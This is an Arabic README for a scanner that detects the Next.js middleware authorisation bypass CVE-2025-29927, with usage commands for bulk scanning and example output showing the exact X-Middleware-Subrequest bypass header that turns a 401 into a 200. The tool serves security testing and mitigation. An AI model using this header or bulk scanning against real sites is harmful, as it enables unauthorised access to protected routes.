
ماسح تجاوز Middleware لـ Next.js
CVE-2025-29927 هي أداة أمنية متخصصة لكشف ثغرة تجاوز الوسيطة في Next.js (CVE-2025-29927) التي تؤثر على الإصدارات 11.1.4 إلى 15.2.2 من Next.js. تسمح هذه الثغرة الحرجة للمهاجمين بتجاوز الضوابط الأمنية عن طريق إرسال رأس HTTP مصمم خصيصًا.
تسمح ثغرة تجاوز الوسيطة في Next.js (CVE-2025-29927) للمهاجمين بتجاوز ضوابط التفويض عن طريق إرسال رأس X-Middleware-Subrequest خبيث يربك منطق معالجة الوسيطة. يمكن أن يؤدي ذلك إلى الوصول غير المصرح به إلى الموارد والمسارات المحمية.
درجة CVSS: 9.1 (حرجة)
# Clone the repository
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927
# Install requirements
pip install -r requirements.txt
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]
-t, --target: هدف واحد للمسح (مثل example.com أو https://example.com)-f, --file: ملف يحتوي على قائمة بالأهداف (هدف واحد في كل سطر)-c, --concurrency: عدد المسوحات المتزامنة (الافتراضي: 5)-k, --insecure: تعطيل التحقق من شهادة SSL (مفيد لعناوين IP)-s, --silent: وضع صامت - عرض الأهداف الضعيفة فقطمسح هدف واحد:
python CVE-2025-29927.py -t example.com
مسح أهداف متعددة من ملف:
python CVE-2025-29927.py -f targets.txt
مسح مع تعطيل التحقق من SSL:
python CVE-2025-29927.py -t 192.168.1.1 -k
المسح الآلي مع الوضع الصامت:
python CVE-2025-29927.py -f targets.txt -k -s
مسح برأس مخصص:
python3 CVE-2025-29927.py -t target -k -s -H "middleware"
بالنسبة للأهداف الضعيفة، يعرض MiddleWay:
مثال على المخرجات:
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
Original status: 401
Bypassed status: 200
Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware
للتخفيف من هذه الثغرة:
X-Middleware-Subrequest على مستوى جدار الحماية (WAF) أو الخادمهذه الأداة مقدمة لأغراض البحث الأمني والدفاع فقط. احرص دائمًا على الحصول على الإذن المناسب قبل مسح أي أنظمة لا تملكها. المؤلفون غير مسؤولين عن أي إساءة استخدام لهذه الأداة.
MIT